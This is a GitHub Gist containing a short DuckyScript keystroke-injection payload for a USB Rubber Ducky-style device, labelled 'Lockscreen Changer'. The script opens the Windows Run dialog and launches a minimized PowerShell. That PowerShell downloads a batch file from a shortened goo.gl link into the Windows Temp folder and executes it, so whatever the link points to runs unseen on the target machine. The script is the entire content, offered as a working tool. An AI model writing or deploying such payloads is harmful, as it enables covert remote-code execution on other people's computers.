Skip to content

Instantly share code, notes, and snippets.

@keyboard-slayer
Created January 9, 2019 21:58
Show Gist options
  • Save keyboard-slayer/222068686b45adbb4b5d8a83b64af624 to your computer and use it in GitHub Desktop.
Save keyboard-slayer/222068686b45adbb4b5d8a83b64af624 to your computer and use it in GitHub Desktop.
REM //////////////////////////////////////////////
REM // Lockscreen Changer
REM // Jordan Dalcq - 0v3rl0w
REM /////////////////////////////////////////////
GUI r
DELAY 500
STRING cmd /C "start /MIN powershell iwr https://goo.gl/99rcr9 -out C:\Windows\Temp\d.bat && C:\Windows\Temp\d.bat"
ENTER
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment